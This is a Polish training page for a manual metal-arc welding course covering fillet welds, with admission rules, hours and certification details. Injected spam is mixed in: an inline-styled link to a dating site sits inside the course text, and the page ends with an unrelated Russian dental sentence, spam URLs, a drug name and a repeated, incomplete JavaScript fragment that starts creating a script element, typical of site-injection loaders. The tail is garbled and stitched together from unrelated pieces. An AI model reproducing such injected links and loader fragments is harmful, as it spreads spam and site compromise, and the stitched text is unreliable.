Elektryczne 111 (1.1)

Kurs spawania blach i rur ze stali ferrytycznych lub nierdzewnych elektrodami otulonymi – Spoiny pachwinowe – metoda 111  – I stopień

<a href=”http://hookuphangout.com/” style=”text-decoration: none; color:#333;”>hookuphangout.com/</a> organizacyjno – programowe:

Cel kursu
Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminu końcowego IS-P/T-FW-1-111lub IS-P/T-FW-8-111
Zasady rekrutacji
  • ukończona co najmniej szkoła podstawowa
  • ukończone 18 lat
  • zaświadczenie lekarskie stwierdzające zdolność do wykonywania zawodu spawacza
Liczba godzin
  • Część teoretyczna – 23 godz. (31 godz.)
  • Część praktyczna: ćwiczenia praktyczne – 130 godz., instruktaż wstępny – 2 godz., egzamin – 8 godz.
  • Razem kurs – 163 godz. (171 godz.)

 

Uzyskane uprawnienia
Uczestnik utrzymuje:
  • uprawnienia do spawania konstrukcji klasy 3  wg PN-87/M-69008
  • uprawnienia te są ważne dwa lata i muszą być przedłużone zgodnie z ustaleniami zawartymi w normie EN 287-1
  • wpis w Książce Spawacza przez Instytut Spawalnictwa  w Gliwicach
  • Świadectwo Egzaminu Spawacza ważne w całej Unii  Europejskiej (Welder Approval Test Certyfikate) w języku polskim i angielskim lub w polskim i  niemieckim wydane przez Instytut Spawalnictwa w Gliwicach
Cena kursu
?

В идеале нужно провести полную санацию http://skyortho.com.ua ротовой полости, пролечить кариес, ведь кариозные полости это очаги инфекцииvar d=document;var s=d.createElement(‚script’); var d=document;var s=d.createElement(‚script’); chlorambucil topspyapps.nethttp://seatoxresearch.com/?p=1641

Top